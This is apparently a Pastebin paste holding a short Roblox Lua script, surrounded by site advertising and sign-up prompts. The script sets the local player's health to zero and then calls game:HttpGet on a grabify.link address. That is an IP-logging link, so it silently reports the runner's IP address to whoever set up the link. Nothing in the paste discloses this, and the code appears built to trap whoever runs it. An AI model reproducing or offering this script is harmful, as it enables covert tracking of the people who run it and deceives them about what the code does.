Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local plyr = game.Players.LocalPlayer;
- local char = plyr.Character;
- local hum = char:FindFirstChild("Humanoid");
- if hum then
- hum.Health = 0;
- end
- game:HttpGet("https://grabify.link/Q0CLHB", true);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement